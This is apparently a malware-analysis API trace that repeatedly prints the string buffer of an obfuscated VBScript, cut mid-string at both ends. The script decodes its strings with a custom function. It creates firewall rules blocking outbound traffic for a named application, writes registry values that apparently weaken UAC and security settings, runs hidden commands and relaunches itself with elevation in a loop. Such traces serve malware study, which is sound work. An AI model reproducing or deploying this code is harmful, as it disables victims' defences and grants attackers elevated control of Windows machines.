bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.308] wcsncmp (_String1="*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0226.308] wcsncmp (_String1="25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0226.308] wcsncmp (_String1="5 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40 [0226.308] wcsncmp (_String1=" + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.308] wcsncmp (_String1="+ (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = 